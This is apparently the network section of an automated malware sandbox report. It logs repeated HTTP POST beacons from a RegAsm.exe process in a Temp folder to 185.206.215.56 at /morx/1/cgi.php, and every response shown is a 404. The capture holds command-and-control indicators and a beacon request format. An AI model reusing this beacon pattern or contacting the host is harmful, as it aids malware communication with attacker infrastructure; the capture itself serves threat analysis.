                                                                                        179192.168.2.2249346185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        18192.168.2.2249185185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.391398907 CET1165OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.558085918 CET1166INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        180192.168.2.2249347185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        181192.168.2.2249348185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        182192.168.2.2249349185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        183192.168.2.2249350185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        184192.168.2.2249351185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        185192.168.2.2249352185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        186192.168.2.2249353185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        187192.168.2.2249354185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        188192.168.2.2249355185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        189192.168.2.2249356185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        19192.168.2.2249186185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.788464069 CET1166OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.954180002 CET1167INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        190192.168.2.2249357185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        191192.168.2.2249358185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        192192.168.2.2249359185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.2249169185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.163208961 CET1144OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 176
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:08.331588984 CET1145INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        20192.168.2.2249187185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.165872097 CET1168OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:15.352806091 CET1168INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        21192.168.2.2249188185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.552401066 CET1169OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:15.734059095 CET1170INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        22192.168.2.2249189185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.960354090 CET1170OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.139384985 CET1171INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        23192.168.2.2249190185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:16.358508110 CET1172OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.531882048 CET1172INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:15 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        24192.168.2.2249191185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:16.795878887 CET1173OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:16.967212915 CET1174INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        25192.168.2.2249192185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.183871031 CET1174OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:17.344388008 CET1175INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        26192.168.2.2249193185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.566776991 CET1176OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:17.726876020 CET1176INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        27192.168.2.2249194185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:17.949146032 CET1177OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.134409904 CET1178INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        28192.168.2.2249195185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:18.364453077 CET1178OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.531193972 CET1179INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        29192.168.2.2249196185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:18.788238049 CET1180OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:18.959882975 CET1180INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        3192.168.2.2249170185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.473301888 CET1145OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:08.645122051 CET1146INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        30192.168.2.2249197185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.176156998 CET1181OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:19.341244936 CET1182INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        31192.168.2.2249198185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.576040030 CET1182OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:19.751715899 CET1183INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        32192.168.2.2249199185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:19.958724022 CET1184OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:20.125689983 CET1184INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        33192.168.2.2249200185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:20.390921116 CET1185OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:20.569029093 CET1186INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        34192.168.2.2249201185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:20.950520992 CET1186OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:21.111865044 CET1187INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        35192.168.2.2249202185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:21.679579973 CET1188OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:21.837781906 CET1188INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        36192.168.2.2249203185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:22.303822041 CET1189OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:22.484252930 CET1190INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:21 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        37192.168.2.2249204185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:22.694391966 CET1190OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:22.877247095 CET1191INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:21 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
